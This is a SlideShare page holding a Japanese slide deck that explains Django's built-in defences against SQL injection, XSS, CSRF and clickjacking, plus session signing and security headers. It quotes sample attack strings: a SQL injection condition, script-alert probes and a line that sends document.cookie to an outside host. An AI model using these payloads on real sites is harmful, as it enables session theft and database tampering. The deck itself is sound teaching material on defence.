Suche senden
Hochladen
Djangoのセキュリティとその実装
•
Als PPTX, PDF herunterladen
•
2 gefällt mir
•
6,079 views
A
aki33524
Folgen
某所勉強会
Weniger lesen
Mehr lesen
Ingenieurwesen
Melden
Teilen
Melden
Teilen
1 von 32
Jetzt herunterladen
Empfohlen
Slideshareで見つけた「読みやすい・見やすいスライド」に共通する4つのポイント
Slideshareで見つけた「読みやすい・見やすいスライド」に共通する4つのポイント
Taichi Hirano
ゲームAI入門(前半)
ゲームAI入門(前半)
Youichiro Miyake
#CCSE2019 GREE VR Studio Lab 「VTuber向け特殊表情コントローラの可能性と機械学習的アプローチ」(速公開版)
#CCSE2019 GREE VR Studio Lab 「VTuber向け特殊表情コントローラの可能性と機械学習的アプローチ」(速公開版)
GREE VR Studio Lab
クラウドファースト時代のAWS活用事例と今後の展望 - AWS Cloud Storage & DB Day 2014
クラウドファースト時代のAWS活用事例と今後の展望 - AWS Cloud Storage & DB Day 2014
Takayuki Enomoto
ロボティクスから探る乳幼児の社会性認知発達(長井 志江)
ロボティクスから探る乳幼児の社会性認知発達(長井 志江)
KIT Cognitive Interaction Design
マインドフルネスと人工知能
マインドフルネスと人工知能
Youichiro Miyake
Cognitive Complexity でコードの複雑さを定量的に計測しよう
Cognitive Complexity でコードの複雑さを定量的に計測しよう
Shuto Suzuki
あなたのスタートアップのアイデアの育てかた
あなたのスタートアップのアイデアの育てかた
Takaaki Umada
Empfohlen
Slideshareで見つけた「読みやすい・見やすいスライド」に共通する4つのポイント
Slideshareで見つけた「読みやすい・見やすいスライド」に共通する4つのポイント
Taichi Hirano
ゲームAI入門(前半)
ゲームAI入門(前半)
Youichiro Miyake
#CCSE2019 GREE VR Studio Lab 「VTuber向け特殊表情コントローラの可能性と機械学習的アプローチ」(速公開版)
#CCSE2019 GREE VR Studio Lab 「VTuber向け特殊表情コントローラの可能性と機械学習的アプローチ」(速公開版)
GREE VR Studio Lab
クラウドファースト時代のAWS活用事例と今後の展望 - AWS Cloud Storage & DB Day 2014
クラウドファースト時代のAWS活用事例と今後の展望 - AWS Cloud Storage & DB Day 2014
Takayuki Enomoto
ロボティクスから探る乳幼児の社会性認知発達(長井 志江)
ロボティクスから探る乳幼児の社会性認知発達(長井 志江)
KIT Cognitive Interaction Design
マインドフルネスと人工知能
マインドフルネスと人工知能
Youichiro Miyake
Cognitive Complexity でコードの複雑さを定量的に計測しよう
Cognitive Complexity でコードの複雑さを定量的に計測しよう
Shuto Suzuki
あなたのスタートアップのアイデアの育てかた
あなたのスタートアップのアイデアの育てかた
Takaaki Umada
iOS側のUIの特徴と見比べるAndroid側でのUI実装のヒント
iOS側のUIの特徴と見比べるAndroid側でのUI実装のヒント
Fumiya Sakai
Introduction to Prioritized Experience Replay
Introduction to Prioritized Experience Replay
WEBFARMER. ltd.
それはYAGNIか? それとも思考停止か?
それはYAGNIか? それとも思考停止か?
Yoshitaka Kawashima
プレゼン初心者にありがちなアンチパターン
プレゼン初心者にありがちなアンチパターン
真俊 横田
線形代数の視覚的理解のためのノート
線形代数の視覚的理解のためのノート
Kenji Hiranabe
高橋メソッドサンプル
高橋メソッドサンプル
Takashi Fujimoto
プロトタイピングとユーザビリティテストで「UXデザイン」を練りあげよう! | UXデザイン基礎セミナー 第4回
プロトタイピングとユーザビリティテストで「UXデザイン」を練りあげよう! | UXデザイン基礎セミナー 第4回
Yoshiki Hayama
AlphaGo Zero 解説
AlphaGo Zero 解説
suckgeun lee
東京大学2020年度深層学習(Deep learning基礎講座) 第9回「深層学習と自然言語処理」(一部文字が欠けてます)
東京大学2020年度深層学習(Deep learning基礎講座) 第9回「深層学習と自然言語処理」(一部文字が欠けてます)
Hitomi Yanaka
ゲーム開発とデザインパターン
ゲーム開発とデザインパターン
Takashi Komada
マッチングサービスにおけるKPIの話
マッチングサービスにおけるKPIの話
cyberagent
これからの Vision & Language ~ Acadexit した4つの理由
これからの Vision & Language ~ Acadexit した4つの理由
Yoshitaka Ushiku
[DL輪読会]Weakly-Supervised Disentanglement Without Compromises
[DL輪読会]Weakly-Supervised Disentanglement Without Compromises
Deep Learning JP
【Unite Tokyo 2018】トゥーンシェーダートークセッション#1『リアルタイムトゥーンシェーダー徹底トーク』
【Unite Tokyo 2018】トゥーンシェーダートークセッション#1『リアルタイムトゥーンシェーダー徹底トーク』
Unity Technologies Japan K.K.
HoloLensで音声認識をする方法を色々試してみた
HoloLensで音声認識をする方法を色々試してみた
Takahiro Miyaura
ソフトウェア開発のやり方の改善
ソフトウェア開発のやり方の改善
増田 亨
とりあえずいい感じになるPower Pointテンプレート「Azusa Colors 改」を作った
とりあえずいい感じになるPower Pointテンプレート「Azusa Colors 改」を作った
幹弘 松山
鷲崎 メトリクスの基礎とGQM法によるゴール指向の測定 2014年12月18日 日本科学技術連名SQiP研究会 演習コースI ソフトウェア工学の基礎
鷲崎 メトリクスの基礎とGQM法によるゴール指向の測定 2014年12月18日 日本科学技術連名SQiP研究会 演習コースI ソフトウェア工学の基礎
Hironori Washizaki
IT系エンジニアのためのプレゼンテーション入門
IT系エンジニアのためのプレゼンテーション入門
Masahito Zembutsu
ゲームニクス理論
ゲームニクス理論
TANREN Inc.
ぼくのかんがえたさいきょうの Rails スタートダッシュ
ぼくのかんがえたさいきょうの Rails スタートダッシュ
Kenji Mori
あなただけにそっと教える弊社の分析事情 #data analyst meetup tokyo vol.1 LT
あなただけにそっと教える弊社の分析事情 #data analyst meetup tokyo vol.1 LT
Hiroaki Kudo
Weitere ähnliche Inhalte
Was ist angesagt?
iOS側のUIの特徴と見比べるAndroid側でのUI実装のヒント
iOS側のUIの特徴と見比べるAndroid側でのUI実装のヒント
Fumiya Sakai
Introduction to Prioritized Experience Replay
Introduction to Prioritized Experience Replay
WEBFARMER. ltd.
それはYAGNIか? それとも思考停止か?
それはYAGNIか? それとも思考停止か?
Yoshitaka Kawashima
プレゼン初心者にありがちなアンチパターン
プレゼン初心者にありがちなアンチパターン
真俊 横田
線形代数の視覚的理解のためのノート
線形代数の視覚的理解のためのノート
Kenji Hiranabe
高橋メソッドサンプル
高橋メソッドサンプル
Takashi Fujimoto
プロトタイピングとユーザビリティテストで「UXデザイン」を練りあげよう! | UXデザイン基礎セミナー 第4回
プロトタイピングとユーザビリティテストで「UXデザイン」を練りあげよう! | UXデザイン基礎セミナー 第4回
Yoshiki Hayama
AlphaGo Zero 解説
AlphaGo Zero 解説
suckgeun lee
東京大学2020年度深層学習(Deep learning基礎講座) 第9回「深層学習と自然言語処理」(一部文字が欠けてます)
東京大学2020年度深層学習(Deep learning基礎講座) 第9回「深層学習と自然言語処理」(一部文字が欠けてます)
Hitomi Yanaka
ゲーム開発とデザインパターン
ゲーム開発とデザインパターン
Takashi Komada
マッチングサービスにおけるKPIの話
マッチングサービスにおけるKPIの話
cyberagent
これからの Vision & Language ~ Acadexit した4つの理由
これからの Vision & Language ~ Acadexit した4つの理由
Yoshitaka Ushiku
[DL輪読会]Weakly-Supervised Disentanglement Without Compromises
[DL輪読会]Weakly-Supervised Disentanglement Without Compromises
Deep Learning JP
【Unite Tokyo 2018】トゥーンシェーダートークセッション#1『リアルタイムトゥーンシェーダー徹底トーク』
【Unite Tokyo 2018】トゥーンシェーダートークセッション#1『リアルタイムトゥーンシェーダー徹底トーク』
Unity Technologies Japan K.K.
HoloLensで音声認識をする方法を色々試してみた
HoloLensで音声認識をする方法を色々試してみた
Takahiro Miyaura
ソフトウェア開発のやり方の改善
ソフトウェア開発のやり方の改善
増田 亨
とりあえずいい感じになるPower Pointテンプレート「Azusa Colors 改」を作った
とりあえずいい感じになるPower Pointテンプレート「Azusa Colors 改」を作った
幹弘 松山
鷲崎 メトリクスの基礎とGQM法によるゴール指向の測定 2014年12月18日 日本科学技術連名SQiP研究会 演習コースI ソフトウェア工学の基礎
鷲崎 メトリクスの基礎とGQM法によるゴール指向の測定 2014年12月18日 日本科学技術連名SQiP研究会 演習コースI ソフトウェア工学の基礎
Hironori Washizaki
IT系エンジニアのためのプレゼンテーション入門
IT系エンジニアのためのプレゼンテーション入門
Masahito Zembutsu
ゲームニクス理論
ゲームニクス理論
TANREN Inc.
Was ist angesagt?
(20)
iOS側のUIの特徴と見比べるAndroid側でのUI実装のヒント
iOS側のUIの特徴と見比べるAndroid側でのUI実装のヒント
Introduction to Prioritized Experience Replay
Introduction to Prioritized Experience Replay
それはYAGNIか? それとも思考停止か?
それはYAGNIか? それとも思考停止か?
プレゼン初心者にありがちなアンチパターン
プレゼン初心者にありがちなアンチパターン
線形代数の視覚的理解のためのノート
線形代数の視覚的理解のためのノート
高橋メソッドサンプル
高橋メソッドサンプル
プロトタイピングとユーザビリティテストで「UXデザイン」を練りあげよう! | UXデザイン基礎セミナー 第4回
プロトタイピングとユーザビリティテストで「UXデザイン」を練りあげよう! | UXデザイン基礎セミナー 第4回
AlphaGo Zero 解説
AlphaGo Zero 解説
東京大学2020年度深層学習(Deep learning基礎講座) 第9回「深層学習と自然言語処理」(一部文字が欠けてます)
東京大学2020年度深層学習(Deep learning基礎講座) 第9回「深層学習と自然言語処理」(一部文字が欠けてます)
ゲーム開発とデザインパターン
ゲーム開発とデザインパターン
マッチングサービスにおけるKPIの話
マッチングサービスにおけるKPIの話
これからの Vision & Language ~ Acadexit した4つの理由
これからの Vision & Language ~ Acadexit した4つの理由
[DL輪読会]Weakly-Supervised Disentanglement Without Compromises
[DL輪読会]Weakly-Supervised Disentanglement Without Compromises
【Unite Tokyo 2018】トゥーンシェーダートークセッション#1『リアルタイムトゥーンシェーダー徹底トーク』
【Unite Tokyo 2018】トゥーンシェーダートークセッション#1『リアルタイムトゥーンシェーダー徹底トーク』
HoloLensで音声認識をする方法を色々試してみた
HoloLensで音声認識をする方法を色々試してみた
ソフトウェア開発のやり方の改善
ソフトウェア開発のやり方の改善
とりあえずいい感じになるPower Pointテンプレート「Azusa Colors 改」を作った
とりあえずいい感じになるPower Pointテンプレート「Azusa Colors 改」を作った
鷲崎 メトリクスの基礎とGQM法によるゴール指向の測定 2014年12月18日 日本科学技術連名SQiP研究会 演習コースI ソフトウェア工学の基礎
鷲崎 メトリクスの基礎とGQM法によるゴール指向の測定 2014年12月18日 日本科学技術連名SQiP研究会 演習コースI ソフトウェア工学の基礎
IT系エンジニアのためのプレゼンテーション入門
IT系エンジニアのためのプレゼンテーション入門
ゲームニクス理論
ゲームニクス理論
Andere mochten auch
ぼくのかんがえたさいきょうの Rails スタートダッシュ
ぼくのかんがえたさいきょうの Rails スタートダッシュ
Kenji Mori
あなただけにそっと教える弊社の分析事情 #data analyst meetup tokyo vol.1 LT
あなただけにそっと教える弊社の分析事情 #data analyst meetup tokyo vol.1 LT
Hiroaki Kudo
Django/Celeyを用いたデータ分析Webアプリケーションにおける非同期処理の設計と実装
Django/Celeyを用いたデータ分析Webアプリケーションにおける非同期処理の設計と実装
Satoshi Nagayasu
Djangoのススメ
Djangoのススメ
Alisue Lambda
Pythonによるwebアプリケーション入門 - Django編-
Pythonによるwebアプリケーション入門 - Django編-
Hironori Sekine
Evan Shegog Slide Presentation Sigma Xi Research Showcase 2014
Evan Shegog Slide Presentation Sigma Xi Research Showcase 2014
evanshegog
Gta 5
Gta 5
Brandon Aaron
Presentation
Presentation
H00228079
Dung si Monti - Ep 03
Dung si Monti - Ep 03
Dung si Monti
Декада
Декада
yury_chica88
Фонд социальной защиты населения Республики Беларусь
Фонд социальной защиты населения Республики Беларусь
yury_chica88
Foton sayma tekniklerikursat
Foton sayma tekniklerikursat
Ahmet Kürşat Bilgili
Dung si Monti - Ep 02
Dung si Monti - Ep 02
Dung si Monti
Pni
Pni
Shruthi Savanth
Hi-Lok Installation
Hi-Lok Installation
Gary Tomkinson
Inspiration from the Future Present - Joel Tarver [Energy Digital Summit 2015]
Inspiration from the Future Present - Joel Tarver [Energy Digital Summit 2015]
Energy Digital Summit
Мат сайт
Мат сайт
Х. Долгоржав
Molodechno trade economics college
Molodechno trade economics college
yury_chica88
Kbm 1 fiqh bab 12
Kbm 1 fiqh bab 12
putraisya
Area and perimeter (1)
Area and perimeter (1)
Mari QZ
Andere mochten auch
(20)
ぼくのかんがえたさいきょうの Rails スタートダッシュ
ぼくのかんがえたさいきょうの Rails スタートダッシュ
あなただけにそっと教える弊社の分析事情 #data analyst meetup tokyo vol.1 LT
あなただけにそっと教える弊社の分析事情 #data analyst meetup tokyo vol.1 LT
Django/Celeyを用いたデータ分析Webアプリケーションにおける非同期処理の設計と実装
Django/Celeyを用いたデータ分析Webアプリケーションにおける非同期処理の設計と実装
Djangoのススメ
Djangoのススメ
Pythonによるwebアプリケーション入門 - Django編-
Pythonによるwebアプリケーション入門 - Django編-
Evan Shegog Slide Presentation Sigma Xi Research Showcase 2014
Evan Shegog Slide Presentation Sigma Xi Research Showcase 2014
Gta 5
Gta 5
Presentation
Presentation
Dung si Monti - Ep 03
Dung si Monti - Ep 03
Декада
Декада
Фонд социальной защиты населения Республики Беларусь
Фонд социальной защиты населения Республики Беларусь
Foton sayma tekniklerikursat
Foton sayma tekniklerikursat
Dung si Monti - Ep 02
Dung si Monti - Ep 02
Pni
Pni
Hi-Lok Installation
Hi-Lok Installation
Inspiration from the Future Present - Joel Tarver [Energy Digital Summit 2015]
Inspiration from the Future Present - Joel Tarver [Energy Digital Summit 2015]
Мат сайт
Мат сайт
Molodechno trade economics college
Molodechno trade economics college
Kbm 1 fiqh bab 12
Kbm 1 fiqh bab 12
Area and perimeter (1)
Area and perimeter (1)
Ähnlich wie Djangoのセキュリティとその実装
「安全なウェブサイトの作り方」を読もう
「安全なウェブサイトの作り方」を読もう
Atsushi Matsuo
ライブコーディングとデモで理解するWebセキュリティの基礎
ライブコーディングとデモで理解するWebセキュリティの基礎
Takahisa Kishiya
web技術 〜セキュリティ編〜.pdf
web技術 〜セキュリティ編〜.pdf
KoudaiKumazaki
第9回勉強会 Webセキュリティー
第9回勉強会 Webセキュリティー
hakoika-itwg
セキュリティ実践講座 -優しい愛をあなたに-
セキュリティ実践講座 -優しい愛をあなたに-
Masaru Ogura
Play_using_Proxy
Play_using_Proxy
Kunio Miyamoto, Ph.D.
Play_using_Proxy
Play_using_Proxy
Kunio Miyamoto, Ph.D.
Vulsで始めよう!DevSecOps!
Vulsで始めよう!DevSecOps!
Takayuki Ushida
ぼくのかんがえたさいきょうのうぇぶあぷりけーしょんふれーむわーく - YAPC Asia 2011
ぼくのかんがえたさいきょうのうぇぶあぷりけーしょんふれーむわーく - YAPC Asia 2011
Hiroh Satoh
すぐできるWeb制作時のセキュリティTips
すぐできるWeb制作時のセキュリティTips
yoshinori matsumoto
Kobe sec#7 summary
Kobe sec#7 summary
Yukio NAGAO
Splunk_NiteX 「ノンテクエンジニアでも、デキる!ログ解析」
Splunk_NiteX 「ノンテクエンジニアでも、デキる!ログ解析」
snicker_jp
テスト駆動で行うネットワーク自動化のすすめ
テスト駆動で行うネットワーク自動化のすすめ
kinunori
WEB開発動作テストの自動化 を行うSeleniumの紹介
WEB開発動作テストの自動化 を行うSeleniumの紹介
Nobuhiko Futagami
そろそろ押さえておきたい AngularJSのセキュリティ
そろそろ押さえておきたい AngularJSのセキュリティ
Muneaki Nishimura
Webセキュリティと W3CとIETFの仕様
Webセキュリティと W3CとIETFの仕様
yuki-f
次世代エンタープライズの開発環境をライブで読み解く
次世代エンタープライズの開発環境をライブで読み解く
Shin Takeuchi
The Amazing Toolman - Mastering the tools and propose a hackable "Swiss Army ...
The Amazing Toolman - Mastering the tools and propose a hackable "Swiss Army ...
SYUE-SIANG SU
Unity に於けるモバイルプラットフォーム向けビルド自動化のおはなし
Unity に於けるモバイルプラットフォーム向けビルド自動化のおはなし
Mori Tetsuya
社内勉強会 20120518
社内勉強会 20120518
yoshinori matsumoto
Ähnlich wie Djangoのセキュリティとその実装
(20)
「安全なウェブサイトの作り方」を読もう
「安全なウェブサイトの作り方」を読もう
ライブコーディングとデモで理解するWebセキュリティの基礎
ライブコーディングとデモで理解するWebセキュリティの基礎
web技術 〜セキュリティ編〜.pdf
web技術 〜セキュリティ編〜.pdf
第9回勉強会 Webセキュリティー
第9回勉強会 Webセキュリティー
セキュリティ実践講座 -優しい愛をあなたに-
セキュリティ実践講座 -優しい愛をあなたに-
Play_using_Proxy
Play_using_Proxy
Play_using_Proxy
Play_using_Proxy
Vulsで始めよう!DevSecOps!
Vulsで始めよう!DevSecOps!
ぼくのかんがえたさいきょうのうぇぶあぷりけーしょんふれーむわーく - YAPC Asia 2011
ぼくのかんがえたさいきょうのうぇぶあぷりけーしょんふれーむわーく - YAPC Asia 2011
すぐできるWeb制作時のセキュリティTips
すぐできるWeb制作時のセキュリティTips
Kobe sec#7 summary
Kobe sec#7 summary
Splunk_NiteX 「ノンテクエンジニアでも、デキる!ログ解析」
Splunk_NiteX 「ノンテクエンジニアでも、デキる!ログ解析」
テスト駆動で行うネットワーク自動化のすすめ
テスト駆動で行うネットワーク自動化のすすめ
WEB開発動作テストの自動化 を行うSeleniumの紹介
WEB開発動作テストの自動化 を行うSeleniumの紹介
そろそろ押さえておきたい AngularJSのセキュリティ
そろそろ押さえておきたい AngularJSのセキュリティ
Webセキュリティと W3CとIETFの仕様
Webセキュリティと W3CとIETFの仕様
次世代エンタープライズの開発環境をライブで読み解く
次世代エンタープライズの開発環境をライブで読み解く
The Amazing Toolman - Mastering the tools and propose a hackable "Swiss Army ...
The Amazing Toolman - Mastering the tools and propose a hackable "Swiss Army ...
Unity に於けるモバイルプラットフォーム向けビルド自動化のおはなし
Unity に於けるモバイルプラットフォーム向けビルド自動化のおはなし
社内勉強会 20120518
社内勉強会 20120518
Djangoのセキュリティとその実装
1.
Djangoのセキュリティとその実装
2.
はじめに • 開発時にDjangoのセキュリティを気にするこ とは少ない – 大体何もやらなければ安全になる –
実際にはどうやって実装されているのか
3.
SQL Injection • なんぞや –
SQLを動的に生成する箇所に意図しない動作を 混入させる – ' OR 1=1; --'
4.
SQL Injection • 対策 –
プレースホルダーを使う – 勝手にエスケープされる
5.
XSS • なんぞや – ユーザーの入力を表示するWebアプリにスクリプ トを注入する攻撃 •
<script>alert(1)</script> – 典型的にはsession idを読みだす • document.location=‘http://example.com’+document.co okie
6.
XSS • そもそも他サイトのsession idは何故読み出せ ない? –
同一生成元ポリシーと呼ばれるブラウザ側の実 装 – 簡単にいえば同じサイトでなければそのcookieな どのリソースを読めない • iframeなどでも同様 – XSSはこれをバイパスする
7.
XSS • 対策 – 適切なエスケープをする
8.
XSS • JSの場合はもう少し複雑なエスケープをする 必要がある – 動的にJSを生成する場合 –
実体参照をしても解釈される – Unicodeコードポイントを埋め込めばエスケープさ れる – escapejs filter
9.
XSS
10.
XSS • URLベース – Javascriptスキームのサイトにredirectさせるケー ス –
Javascript:alert(1) – http/https以外のスキームを許容しない
11.
XSS
12.
CSRF • なんぞや – リンクを踏ませるなどしてユーザーの意図しない リクエストを行う –
DjangoではPOST, PUT, DELETE, CONNECTでCSRF 対策を行っている
13.
CSRF • 対策 – {%
csrf_token %} – csrfmiddlewaretokenというフィールドをhiddenで 埋め込む – csrftokenというフィールドをcookieに埋め込む – POSTされてきたタイミングで両者が同じ値か チェック
14.
CSRF
15.
CSRF
16.
CSRF
17.
CSRF
18.
CSRF
19.
CSRF
20.
CSRF
21.
クリックジャッキング • なんぞや – 攻撃者のページの上に透明なiframeを重ねて、 意図しないままにボタンをクリックさせたりする手 法 –
この方法ならユーザーが直接クリックするので csrftokenを回避できる
22.
クリックジャッキング • 対策 – そもそもiframeで呼ばれないようにしちゃおう –
X-Frame-Options • SAMEORIGIN – 同一オリジンポリシーに則りロード可能とする – Djangoはデフォルトこっち • DENY – 問答無用でロード不可とする
23.
クリックジャッキング
24.
SECRET_KEY • Startprojectした際にget_random_secret_key() で生成する – 内部ではurandom()を使っている(Ubuntuの場 合) –
暗号論的擬似乱数生成器
25.
SECRET_KEY
26.
SECRET_KEY • Urandomに対応していない時にSECRET_KEY を使う – こっちはあんまり重要ではない •
認証!!!!!
27.
SECRET_KEY • 認証とは? – データの改竄を検出する –
Hash(salt + message)? • 実は安全ではない(length-extension attack) • Hmacを使う
28.
SECRET_KEY • Sessionの保存時に認証を掛ける – 符号化形式は •
Pickleベース – 1.5.2以前ではデフォルト – 改ざんされると任意コードを実行できる • Jsonベース – 改ざんされても任意コードは実行できない
29.
SECRET_KEY
30.
1.8xで追加される機能 • SecurityMiddleware – リクエストにセキュリティに関係するヘッダを追加 •
x-xss-protection – ブラウザのXSSフィルターを有効化する • x-content-type-options – Contentからのファイル内容の推測を抑制する – 古いIEでは不正な画像ファイルなどからスクリプトを埋め込め た • strict-transport-security – httpsのサイトにhttpでアクセスしようとし時にリダイレクトせず に直接httpsでアクセスする。
31.
1.9xで追加される機能 • password_validation – 以下の条件を満たすパスワードは作れない •
8文字未満(デフォルト) • 数字だけ • よくあるパスワード1000選 • ユーザーの任意のattributeと編集距離が小さい – 1.11に上げた時にハマるかも? • Settingsで無効にすれば良い
32.
まとめ • 明示的に表記する必要があるケース – Javascriptを動的生成する時 •
Escapejs filter – AjaxでPOSTする時 • Viewにcsrf_exemptを付けるのはやめよう • HTTP_X_CSRFTOKEN – Djangoのバージョンが1.5.2以前の時 • JSONSerializerを使うようにする – Djangoのバージョンが1.3以前の時 • Redirect先をユーザーが指定できないようにする
Jetzt herunterladen